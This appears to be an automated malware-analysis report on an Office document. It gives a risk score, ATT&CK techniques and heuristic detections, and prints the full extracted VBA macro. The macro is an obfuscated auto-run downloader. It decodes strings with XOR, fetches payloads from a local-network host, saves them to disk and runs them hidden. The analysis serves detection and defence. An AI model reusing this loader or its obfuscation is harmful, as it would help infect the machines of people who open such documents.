MALICIOUS
398
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1059 Command and Scripting Interpreter
The sample contains a VBA macro that is obfuscated and uses CreateObject and Shell calls, indicating malicious intent. The macro attempts to download a payload from the URL http://192.168.1.239:8000 and execute it, which is a common technique for delivering second-stage malware. The presence of WScript.Shell usage and the HTTP download functionality strongly suggest this is a downloader.
Heuristics 11
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Call Shell(r5em520j("3" & "" & Chr(61) & Chr(52) & "~" & "" & "5" & Chr(40) & Chr(53) & "" & "p" & "" & " " & "" & " " & "p" & "" & Chr(127) & "" & " " & "") & r5em520j("#" & Chr(36) & Chr(49) & "" & """" & "" & "$" & "p") + e1xa5dt7, vbHide) -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set oShell = CreateObject("WScript.Shell") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.write xHttp.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Dim xHttp: Set xHttp = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & "")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim xHttp: Set xHttp = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & "")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
e1xa5dt7 = Environ(r5em520j(Chr(17) & "" & Chr(32) & " " & "" & Chr(20) & Chr(49) & Chr(36) & Chr(49))) + r5em520j(" " & Chr(29) & "" & "9" & Chr(51) & Chr(34) & "?" & "" & "#" & Chr(63) & "" & Chr(54) & "" & Chr(36) & Chr(3) & Chr(53) & "" & Chr(34) & Chr(38) & "" & Chr(57) & "" & "3" & Chr(53) & "" & "#") -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://192.168.1.239:8000 Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5682 bytes |
SHA-256: d96f8666aa8de4dc026a50f1c52ff1cf64d797acc6ba8e3b0e1a6d1c645c3add |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function rm9y(str As String) As Variant: Dim bytes() As Byte: bytes = str: rm9y = bytes: End Function
Function x9vj(bytes() As Byte) As String: Dim str As String: str = bytes: x9vj = str: End Function
Function r5em520j(str As String) As String
Const p_ As String = "o4jskyrr"
Dim sb_() As Byte, pb_() As Byte
sb_ = rm9y(str)
pb_ = rm9y(p_)
Dim uL As Long
uL = UBound(sb_)
ReDim scb_(0 To uL) As Byte
Dim idx As Long
For idx = LBound(sb_) To uL:
If Not sb_(idx) = 0 Then
c = sb_(idx)
For i = 0 To UBound(pb_):
c = c Xor pb_(i)
Next i
scb_(idx) = c
End If
Next idx
r5em520j = x9vj(scb_)
End Function
Private Sub Document_Open()
Dim xHttp: Set xHttp = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & ""))
Dim bStrm: Set bStrm = CreateObject(r5em520j(" " & Chr(52) & "" & Chr(63) & "4" & "2" & "~" & Chr(3) & "" & Chr(36) & "" & Chr(34) & Chr(53) & Chr(49) & Chr(61)))
Dim miydzki9 As String
'miydzki9 = r5em520j(Chr(49) & Chr(52) & ";" & " " & " " & "1" & "" & Chr(34) & "" & Chr(36))
miydzki9 = "http://192.168.1.239:8000"
xHttp.Open r5em520j(" " & Chr(21) & " "), miydzki9 + r5em520j(Chr(127) & Chr(3) & Chr(53) & Chr(49) & """" & "3" & "" & "8" & "" & "5" & "" & " " & "" & " " & "~" & "" & Chr(32) & ">" & "" & "7" & ""), False
xHttp.Send
Dim e1xa5dt7 As String
e1xa5dt7 = Environ(r5em520j(Chr(17) & "" & Chr(32) & " " & "" & Chr(20) & Chr(49) & Chr(36) & Chr(49))) + r5em520j(" " & Chr(29) & "" & "9" & Chr(51) & Chr(34) & "?" & "" & "#" & Chr(63) & "" & Chr(54) & "" & Chr(36) & Chr(3) & Chr(53) & "" & Chr(34) & Chr(38) & "" & Chr(57) & "" & "3" & Chr(53) & "" & "#")
If Len(Dir(e1xa5dt7, vbDirectory)) = 0 Then
MkDir e1xa5dt7
End If
e1xa5dt7 = e1xa5dt7 + r5em520j(Chr(12) & Chr(3) & Chr(53) & "" & Chr(49) & """" & "" & Chr(51) & "8" & Chr(53) & "" & " " & "" & " " & "~" & Chr(53) & Chr(40) & Chr(53) & "")
With bStrm
.Type = 1 '//binary
.Open
.write xHttp.responseBody
.savetofile e1xa5dt7, 2 '//overwrite
End With
Call Shell(r5em520j("3" & "" & Chr(61) & Chr(52) & "~" & "" & "5" & Chr(40) & Chr(53) & "" & "p" & "" & " " & "" & " " & "p" & "" & Chr(127) & "" & " " & "") & r5em520j("#" & Chr(36) & Chr(49) & "" & """" & "" & "$" & "p") + e1xa5dt7, vbHide)
Dim xHttp2: Set xHttp2 = CreateObject(r5em520j(Chr(29) & "" & Chr(57) & "3" & "" & """" & Chr(63) & "#" & "" & Chr(63) & "" & Chr(54) & Chr(36) & "" & "~" & "" & " " & "" & " " & "" & Chr(28) & Chr(24) & "" & Chr(4) & "" & Chr(4) & "" & " " & ""))
Dim bStrm2: Set bStrm2 = CreateObject(r5em520j(" " & Chr(52) & "" & Chr(63) & "4" & "2" & "~" & Chr(3) & "" & Chr(36) & "" & Chr(34) & Chr(53) & Chr(49) & Chr(61)))
xHttp2.Open r5em520j(" " & Chr(21) & " "), miydzki9 + r5em520j(" " & Chr(36) & "" & "1" & "" & "#" & "" & Chr(59) & Chr(56) & "?" & "" & Chr(35) & "" & Chr(36) & Chr(39) & "5" & "" & Chr(126) & " " & Chr(62) & "" & Chr(55)), False
xHttp2.Send
e1xa5dt7 = Environ(r5em520j(Chr(17) & "" & Chr(32) & " " & "" & Chr(20) & Chr(49) & Chr(36) & Chr(49))) + r5em520j(" " & "" & Chr(29) & "9" & "" & "3" & "" & """" & "?" & Chr(35) & "" & "?" & "6" & "$" & "" & " " & Chr(53) & """" & Chr(38) & "" & "9" & "3" & Chr(53) & "" & "#" & "" & " " & "" & Chr(36) & Chr(49) & Chr(35) & ";" & "8" & Chr(63) & Chr(35) & "" & Chr(36) & Chr(39) & "" & Chr(53) & "" & Chr(126) & "5" & "" & Chr(40) & "" & "5" & "")
With bStrm2
.Type = 1 '//binary
.Open
.write xHttp2.responseBody
.savetofile e1xa5dt7, 2 '//overwrite
End With
Call Shell(r5em520j("3" & "" & Chr(61) & Chr(52) & "~" & "" & "5" & Chr(40) & Chr(53) & "" & "p" & "" & " " & "" & " " & "p" & "" & Chr(127) & "" & " " & "") & r5em520j("#" & Chr(36) & Chr(49) & "" & """" & "" & "$" & "p") + e1xa5dt7, vbHide)
ActiveDocument.Sections(1).Range.Font.Hidden = True
ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
ActiveDocument.Background.Fill.ForeColor.RGB = RGB(255, 255, 255)
ActiveDocument.Background.Fill.Transparency = 0#
End Sub
Private Sub Document_Close()
ActiveDocument.Sections(1).Range.Font.Hidden = False
ActiveDocument.ActiveWindow.View.DisplayBackgrounds = True
ActiveDocument.Background.Fill.ForeColor.RGB = RGB(47, 84, 150)
'ActiveDocument.Background.Fill.Transparency = 0#
Documents.Save NoPrompt:=True, _
OriginalFormat:=wdOriginalDocumentFormat
End Sub
Public Function ShellRun() As Boolean
Dim oShell As Object
Set oShell = CreateObject("WScript.Shell")
Dim oExec As Object
Dim oOutput As Object
Set oExec = oShell.Exec("wmic os get OsArchitecture")
Set oOutput = oExec.StdOut
Dim s As Boolean
s = False
Dim sLine As String
While Not oOutput.AtEndOfStream
sLine = Trim(oOutput.ReadLine)
If InStr(sLine, "64-bit") = 1 Then s = True
Wend
ShellRun = s
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.